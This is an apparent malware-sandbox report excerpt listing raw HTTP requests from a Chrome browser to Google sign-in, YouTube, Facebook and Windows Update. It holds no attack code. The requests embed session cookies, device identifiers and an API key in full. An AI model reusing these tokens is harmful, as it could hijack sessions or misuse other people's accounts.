version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp2gStXVrlBaQMjEgnAGuNCSSHQe1IaseXO0u3ysS0pvSXZ4fQfiD0S-4xguuLCPZm_FnOKq&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-787607905%3A1705534499113821&theme=glifAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp2tJPB3Ojygu8H0Nq-e-VWoesVuSqMqtwVz1w7gLDZs0sblPrXYTPEhXtH_AYuP9vdSp9W6Tg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-586605101%3A1705534478563012&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/_/bscframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; datr=DGSoZXKoCY8OkV9WMe-nT3iH; wd=1280x907; _js_datr=CmSoZS_e47taJeaFNDxl31-H; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQo.AWU78CfQ8GM
Source: global traffic	HTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; datr=DGSoZXKoCY8OkV9WMe-nT3iH; wd=1280x907; _js_datr=CmSoZS_e47taJeaFNDxl31-H; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQo.AWU78CfQ8GM
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&ctier=L&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.youtube.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D; PREF=tz=Europe.Zurich; YSC=5Mm10cZ-erg
Source: global traffic	HTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; datr=DGSoZXKoCY8OkV9WMe-nT3iH; wd=1280x907; _js_datr=CmSoZS_e47taJeaFNDxl31-H; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQo.AWU78CfQ8GM
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=941241983&timestamp=1705534504688 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=5Mm10cZ-erg
Source: global traffic	HTTP traffic detected: GET /generate_204 HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; OTZ=7387175_52_52_123900_48_436380; __Host-GAPS=1:vwc5Fxh26ZaiFwvZVypSBIlciNnvtQ:StK8MVu31lxzbeEl
Source: global traffic	HTTP traffic detected: GET /generate_204?jUQAow HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; OTZ=7387175_52_52_123900_48_436380; __Host-GAPS=1:8NYQ1jjDG5rOMGPnOF4Q2qPYlrHdbw:Pr7VuCt41o1dCYDD
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=P+KoVP9x6mYxasV&MD=CFat5hzV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNAQiG8M0BCPnA1BUY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
